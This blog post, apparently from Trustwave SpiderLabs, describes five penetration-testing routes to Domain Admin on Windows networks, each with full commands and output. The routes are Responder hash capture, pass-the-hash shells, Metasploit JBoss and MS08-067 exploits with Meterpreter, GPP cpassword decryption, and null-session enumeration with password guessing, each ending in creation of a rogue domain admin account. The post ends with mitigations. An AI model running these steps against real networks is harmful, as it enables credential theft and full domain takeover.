Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network

It's always surprising how insecure some internal networks turn out to be. Less surprising is a client's reaction to SpiderLabs attaining Domain Admin within the first day of testing. Software is installed with default settings, patches are not applied, or basic precautions are not taken during or after setting policies. While there are times when a penetration tester has to work harder to gain Domain Access to an internal network, this is a list of the top five quickest ways to Domain Admin.

Disclaimer – No "Teen Wolf" based high school(see "Beacon Hills High": references below) or "Middle Earth"(see various references below) internal networks were pwned in the making of this blog post.

1. Netbios and LLMNR Name Poisoning

One of the first things that is kicked off on an internal penetration test is Responder. Laurent Gaffié gifted SpiderLabs with our favorite tool in October 2012. If you would like more in-depth information please visit these links:

http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html
http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html

Typically, when a Windows workstation needs to request a name lookup, it checks the following 3 places in order: Local Hosts File, Configured DNS Servers, and NetBIOS Broadcasts. If the request fails on both the local hosts file and DNS, it then makes a broadcast NetBIOS request on the local network. Since this is a broadcast request, any system on the local network can answer. Using Responder, SpiderLabs is able to respond as a functional service without the need to ARP spoof (and possibly trigger countermeasures).

In addition, LLMNR poisoning takes advantage of the process by which Windows systems resolve hostnames. After a mistyped hostname is checked in DNS, Windows will take addresses that do not resolve and request the address from the local network through a LLMNR request to determine if the host is on the local network. By responding to these requests, an attacker has the ability to take advantage of these errors and allow these requests to be serviced by the attacker's system. By doing so, the attacker can receive the credentials for Intranet authentication as well as potentially serve malicious pages back to the requester.

~/Responder# python Responder.py -i 192.168.8.25
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C

[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF

LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.12. The requested name was : 110.
…snip…

NBT-NS Answer sent to: 192.168.8.6
[+]SMB-NTLMv2 hash captured from : 192.168.8.6
Domain is : BEACONHILLSHIGH
User is : smccall
[+]SMB complete hash is : smccall::BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ECONOMY309\IPC$
…snip...

LLMNR poisoned answer sent to this IP: 192.168.8.11. The requested name was : wpad.
[+]SMB-NTLMv2 hash captured from : 192.168.8.11
Domain is : BEACONHILLSHIGH
User is : lmartin
[+]SMB complete hash is : lmartin:: BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ADVCHEM\311IPC$
…snip…

Passwords, whether LM, NTLMv1, or NTLMv2, can be cracked using brute force and dictionary attacks. If a Domain Admin account is captured during a responder session, it can be used to access a computer on the Domain, and a Domain Admin account can easily be created.

Winexe-PTH is software that allows an attacker to execute commands remotely on Windows systems from a Linux system. Common commands that can be run are - cmd.exe, ipconfig, wsftp, vnc, etc. It's used when the Metasploit's psexec module fails to bypass the Anti-virus on the system.

~/work/nmap# ~/SpiderLabs/winexe-PTH -U BEACONHILLSHIGH\\smccall%allison --uninstall --system //192.168.8.6 cmd.exe
Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.

The command completed successfully.

C:\WINDOWS\system32> net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.

The command completed successfully.

2. Exploitable JBoss Vulnerability

Once the nmap scans are complete and open ports have been listed out, a quick Metasploit auxiliary scan is run to look for JBoss vulnerabilities. JBoss is a Java-based web application server, and the JBoss Java Management Extensions (JMX) console is a web interface for managing the Java resources (mbeans) provided by the JBoss framework. Furthermore, it provides administrative access to JMX functions, including the ability to upload and execute arbitrary JSP packages. Access to the JMX Console therefore ultimately permits an attacker to execute arbitrary code in the context of the web service account.

msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E >> http.jboss.8080
~/work/nmap# cat http.jboss.8080

[*] Initializing modules...
THREADS => 25
RHOSTS => file:./8080
DICTIONARY => ./http.scan.list
RPORT => 8080
[*] Detecting error code
[*] Detecting error code
[*] Detecting error code
[*] Detecting error code
[*] Using code '404' as not found for 192.168.5.18
[*] Using code '404' as not found for 192.168.5.21
[*] Using code '404' as not found for 192.168.5.20
[*] Found http://192.168.5.20:8080/web-console/ 401 (192.168.5.20)
[*] http://192.168.5.20:8080/web-console/ requires authentication: Basic realm="JBoss JMX Console"
[*] Found http://192.168.5.20:8080/web-console/ 404 (192.168.5.20)
[*] Found http://192.168.5.20:8080/jmx-console/ 401 (192.168.5.20)
[*] http://192.168.5.20:8080/jmx-console/ requires authentication: Basic realm="JBoss JMX Console"
[*] Found http://192.168.5.21:8080/jmx-console/ 404 (192.168.5.21)
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed

Output from use auxiliary/scanner/http/jboss_vulnscan:
[*] 192.168.5.20:8080 /jmx-console/HtmlAdaptor requires authentication (401): Basic realm="JBoss JMX Console"
[*] 192.168.5.20:8080 Check for verb tampering (HEAD)
[+] 192.168.5.20:8080 Got authentication bypass via HTTP verb tampering
[+] 192.168.5.20:8080 Authenticated using admin:admin
[+] 192.168.5.20:8080 /status does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/ServerInfo.jsp does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/Invoker does not require authentication (200)
[+] 192.168.5.20:8080 /invoker/JMXInvokerServlet does not require authentication (200)

Output from use exploit/multi/http/jboss_maindeployer:
msf exploit(jboss_maindeployer) > exploit

[*] Started reverse handler on 192.168.5.233:4444
[*] Sorry, automatic target detection doesn't work with HEAD requests
[*] Automatically selected target "Java Universal"
[*] Starting up our web service on http://192.168.5.233:1337/HlusdqEcokvXH.war ...
[*] Using URL: http:// 192.168.5.233:1337/HlveuqEzrovXH.war
[*] Asking the JBoss server to deploy (via MainDeployer) http://192.168.5.233:1337/HlusdqEcokvXH.war [*] Sending the WAR archive to the server...
[*] Sending the WAR archive to the server...
[*] Waiting for the server to request the WAR archive....
[*] Shutting down the web service...
[*] Executing HlusdqEcokvXH...
[+] Successfully triggered payload at '/HlusdqEcokvXH/ewNYTEdFnYdcaOl.jsp'
[*] Undeploying HlusdqEcokvXH...
[*] Sending stage (30355 bytes) to 192.168.5.159
[*] Meterpreter session 1 opened (192.168.5.233:4444 -> 192.168.5.20:4209) at 2013-09-15 19:00:06 -0600

meterpreter > sysinfo
Computer : BHHSMOFF011
OS : Windows 2003 5.2 (x86)
Meterpreter : java/java

meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\DELLBAC\EJBContainer\bin>whoami
whoami
beaconhillshigh\backup_admin

C:\>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.

The command completed successfully.

C:\>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.

The command completed successfully.

3. MS08-067

It's been over 4 years now, but unpatched MS08-067 machines are still out in the wild. The Microsoft Security Bulletin MS08-067 essentially explains that remote code can be executed on an unpatched Windows systems (Windows Server 2000, Windows Server 2003, and Windows XP) using a specially fashioned RPC request. First nmap is used to check for the vulnerability and then the Metasploit ms08-067_netapi module is used to exploit the vulnerability.

nmap --script=smb-check-vulns.nse -v -v -p 445,139 -iL smb -oA ms08 less ms08.nmap
...snip...
Nmap scan report for shelob-squared (192.168.1.103)

Host is up (0.00042s latency).
Scanned at 2013-09-16 21:52:32 CDT for 55s
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:E3:25:78 (VMware)

Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
...snip...

Next, the m08-067 Metasploit module is used to attempt to exploit the vulnerability.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.215
LHOST => 192.168.1.215
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.215:33354 -> 192.168.1.103:4444) at 2013-09-16 21:54:15 -0500

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer : SHELOB-SQUARED
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 48c76bfa334c4c21edd1154db541c2c2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

Frodo:"what do i have"
Samwise:"Frodo"
Stryder:"love"
Legolas:"favorite saying"
Gimli:"what am i"
Boromir:"what I am"
Gandalf:"moria"

[*] Dumping password hashes...
Administrator:500:f75d090d8564fd334a3b108f3fa6cb6d:3019d5d61cdf713c7b677efefc22f0e5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:7e8a50750d9a1a30d3d4a83f88ea86ab:6fba9c0f469be01bab209ee2785a818d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:861165412001ece0a5e73ab8863129d8:::
Frodo:1003:74052b0fb3d802a3be4db4ed34a95891:a7cee25799f518f9bd886683a13ed6d0:::
Samwise:1004:aad3b435b51404eeaad3b435b51404ee:7dff81410af5e2d0c2b6e54a98a8f622:::
Stryder:1005:825f8bc99c2a5013e72c57ef50f76a05:1047f0b952cfbffbdd6c34ef6bd610e5:::
Legolas:1006:625d787db20f1dd8aad3b435b51404ee:cc5b9f225e569fa3a2534be394df531a:::
Gimli:1007:aad3b435b51404eeaad3b435b51404ee:e4d2534368ff0f1cbe2a42c5d79b9818:::
Boromir:1008:e3bee25ac9de68cec2cc282901fd62d9:4231db4c15025d1951f3c0d39d8656a2:::
Gandalf:1009:20ef2c7725e35c1dbd7cfc62789a58c8:02d0a4d2b6c7d485a935778eb90e0446:::

meterpreter > shell
Process 2708 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\ WINDOWS\system32>whoami

whoami
MIRKWOOD\Gandalf

C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.

The command completed successfully.

C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.

The command completed successfully.

4. GPO cpassword

If Domain Admin hasn't been achieved via credentials obtained from running Responder, or dumping hashes on various systems, another place to look is the Domain Controller Policies and Scripts on Windows 2008 servers. Group Policy Objects are used to store profile information about network systems and users to be applied across the domain. Smbclient can be used to grab or put files on target systems or in this case retrieve information from the system directory.

smbclient -W MIRKWOOD -U 'Legolas%orcs' \\\\192.168.1.105\\SYSVOL
Domain=[ MIRKWOOD] OS=[Windows Server 2008 R2 Standard 7600] Server=[Windows Server 2008 R2 Standard 6.1]

smb: \> dir
. D 0 Wed Sep 15 15:08:37 2012
.. D 0 Wed Sep 15 15:08:37 2012
mirkwood.local D 0 Wed Sep 15 15:08:37 2012

48457 blocks of size 4194304. 44175 blocks available

smb: \> cd mirkwood.local\
smb: \smirkwood.local\> dir
. D 0 Wed Sep 15 15:13:05 2012
.. D 0 Wed Sep 15 15:13:05 2012
Policies D 0 Tue Oct 30 10:29:31 2012
scripts D 0 Thu Nov 8 12:50:21 2012

smb:\> recurse
smb:\> prompt off
smb:\> mget Policies
…snip…

getting file \mirkwood\Policies\PolicyDefinitions\access32.admx of size 98874 as access32.admx (3657.0 KiloBytes/sec) (average 3657.0 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\access34.admx of size 131924 as access34.admx (27324.5 KiloBytes/sec) (average 7038.2 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\ActiveXInstallService.admx of size 7217 as ActiveXInstallService.admx (2303.1 KiloBytes/sec) (average 6722.5 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\AddRmvPrograms.admx of size 7214 as AddRmvPrograms.admx (2301.6 KiloBytes/sec) (average 6446.2 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\asdf.admx of size 4249 as asdf.admx (122.0 KiloBytes/sec) (average 4940.4 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\AppCompat.admx of size 4893 as AppCompat.admx (2633.2 KiloBytes/sec) (average 4835.6 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\AttachmtMgr.admx of size 3865 as AttachmtMgr.admx (2912.5 KiloBytes/sec) (average 4752.0 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\AutoPlay.admx of size 5591 as AutoPlay.admx …snip…

smb:\> recurse
smb:\> prompt off
smb:\> mget scripts
…snip…

smb: \avi\> mget scripts
Get directory scripts? y
Get directory bin? y
Get file #INCLUDE.BAT? y
getting file \ mirkwood \scripts\bin\#INCLUDE.BAT of size 2839 as #INCLUDE.BAT (409.6 KiloBytes/sec) (average 409.7 KiloBytes/sec)
getting file \ mirkwood \scripts\bin\NETLOGON.BAT of size 1438 as NETLOGON.BAT (28.9 KiloBytes/sec) (average 137.7 KiloBytes/sec)
getting file \ mirkwood \scripts\bin\NETLOGON2.BAT of size 16781 as NETLOGON2.BAT (691.0 KiloBytes/sec) (average 566.0 KiloBytes/sec)
getting file \ mirkwood \scripts\bin\NETLOGON3.BAT of size 16486 as NETLOGON3.BAT (1268.5 KiloBytes/sec) (average 773.6 KiloBytes/sec)
getting file \ mirkwood \scripts\bin\NETLOGON4.BAT of size 17429 as NETLOGON4.BAT (1108.7 KiloBytes/sec) (average 858.8 KiloBytes/sec)
…snip…

Once the files are downloaded, grep through both policies and scripts for Administrator or cpassword (either would work in this instance):

grep -ri administrator .
grep -ri cpassword .

~/work/nmap/192.168.1.0-24/downloads/Policies# grep -ri administrator .
./{FC71D7SS-51E2-4B9D-B261-GB8C9733D433}/Machine/Preferences/Groups/Groups.xml: :<Groups clsid="{3125E277-EB16-4b4c-6534-544FC6D24D26}"><User clsid="{HH5F1654-51E6-4d24-9B1A-D9BFN34BA1D1}" name="Administrator (built-in)" image="2" changed="2012-12-30 12:47:25" uid="{8E2D5E22-E914-438F-SS5D-FDDA92925BB7}" userContext="0" removePolicy="0"><Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>

The cpassword is taken and run through the decryption script from http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html.

~/work# ruby decrypt.rb
Local*P4ssword!

~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\'Administrator%Local*P4ssword!' --uninstall --system //192.168.1.103 cmd.exe
Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32> net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.

The command completed successfully.

C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.

The command completed successfully.

5. NetBIOS Null Enumeration Allowed on Server

This basically allows anyone on the network to query the Domain Controller for a complete list of users, group memberships and lockout policies. After successfully running enum4linux.pl, using grep to discover Domain Admins or Enterprise Admins cuts down on time spent running recovered user credentials against systems. In some cases, Domain Admin has been achieved due to the password being the same as the administrator login.

~/enum4linux.pl -u Legolas -p orcs -w MIRKWOOD -a 192.168.1.90 >> enum-192.168.1.90

~/work/targets/192.168.1.0-24# cat enum-192.168.1.90
Starting enum4linux v0.8.7 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep 10 10:15:14 2013

==========================
| Target Information |
==========================
Target ........... 192.168.1.90
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

===================================================
| Enumerating Workgroup/Domain on 192.168.1.90 |
===================================================
[+] Got domain/workgroup name: MIRKWOOD

===========================================
| Nbtstat Information for 192.168.1.90 |
===========================================
Looking up status of 192.168.1.90
MODOR <00> - M Workstation Service
MIRKWOOD <00> - M Domain/Workgroup Name
MIRKWOOD <1c> - M Domain Controllers
MORDOR <20> - M File Server Service

MAC Address = B5-AD-2F-37-2G-4F

====================================
| Session Check on 192.168.1.90 |
====================================
[+] Server 192.168.1.90 allows sessions using username '', password ''
…snip…

============================
| Users on 192.168.1.90 |
============================
index: 0x2b76 RID: 0xd08 acb: 0x00000610 Account: Administrator Name: Administrator Desc: (null)
index: 0x1822 RID: 0xb0a acb: 0x00000414 Account: Frodo Name: Frodo Baggins Desc: (null)
index: 0x1bga RID: 0xc0a acb: 0x00080210 Account: Samwise Name: Samwise Gamgee User Desc: (null)
index: 0x1dc4 RID: 0xc7a acb: 0x00050210 Account: Stryder Name: Aragorn User Desc: (null)
index: 0x1823 RID: 0xb0b acb: 0x00007014 Account: Legolas Name: Legolas Greenleaf Desc: (null)
index: 0x1824 RID: 0xb0c acb: 0x00010014 Account: Gimli Name: Gimli son of Glóin Desc: (null)
index: 0x1825 RID: 0xb0d acb: 0x00300014 Account: Boromir Name: Boromir son of Denethor II Desc: (null)
index: 0x126f RID: 0x9eb acb: 0x00004014 Account: Gandalf Name: Gandalf the Gray Desc: (null)
index: 0x1826 RID: 0xb0e acb: 0x00020015 Account: gollum Name: gollum Desc: (null)
…snip…

~/work/targets/192.168.1.90# cat enum-192.168.1.90 .txt | grep "Domain Admins"
Group 'Administrators' (RID: 544) has member: MIRKWOOD\Domain Admins
Group:[Domain Admins] rid:[0x200]
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Gandalf
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Stryder
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Administrator
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \gollum
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Saruman
S-1-5-21-8675309254-522963170-1866889882-512 MIRKWOOD \Domain Admins (Domain Group)
S-1-5-21-1897573695-8675309227-1212564242-512 MORDOR\Domain Admins (Domain Group)

~/work/nmap/# medusa -M smbnt -H smb -u gollum -p gollum -m GROUP:DOMAIN | tee smb-gollum.medusa
ACCOUNT CHECK: [smbnt] Host: 192.168.1.1 (1 of 62, 0 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.1 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (2 of 62, 1 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.100 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.105 (3 of 62, 2 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.105 User: gollum Password: gollum [SUCCESS]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.106 (4 of 62, 3 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.106 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.107 (5 of 62, 4 complete) User: ssadmin (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.107 User: gollum Password: gollum [SUCCESS]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.11 (7 of 62, 6 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.11 User: gollum Password: gollum [SUCCESS]
…snip…

~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\gollum%gollum --uninstall --system //192.168.1.106 cmd.exe
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\ WINDOWS\system32>whoami

whoami MIRKWOOD\gollum

C:\WINDOWS\system32>> net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.

The command completed successfully.

C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.

The command completed successfully.

Most of above examples of Domain Admin access could have been avoided.

Here's how:

  • Disabling NetBIOS on older Windows systems and the LLMNR protocol on systems running Vista and later for name lookups would go a long way to prevent the capture of hashes on an internal network.
  • Make sure to secure software installations by changing default account settings, and setting secure passwords.
  • Create and maintain a patch management process whereby networks are periodically scanned for out of date operating systems and software, then update/ upgrade and patch the systems.
  • Do not set administrative passwords through group policy objects. If local Administrative accounts must be used, use randomized passwords to restrict the limit the depth of compromise.
  • While a NULL NetBIOS access setting may seem like a low risk issue, when anonymous access occurs it can increase the chances of compromising access to the internal network as it leaks users, groups, and policies. Windows domain controllers and servers can have this function disabled to prevent data enumeration.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.